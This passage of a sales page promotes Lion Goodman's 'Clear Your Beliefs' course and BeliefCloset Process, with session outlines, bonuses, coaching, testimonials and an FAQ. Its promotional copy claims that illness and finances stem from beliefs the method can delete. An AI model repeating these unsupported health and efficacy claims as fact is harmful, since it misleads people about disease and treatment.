much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" 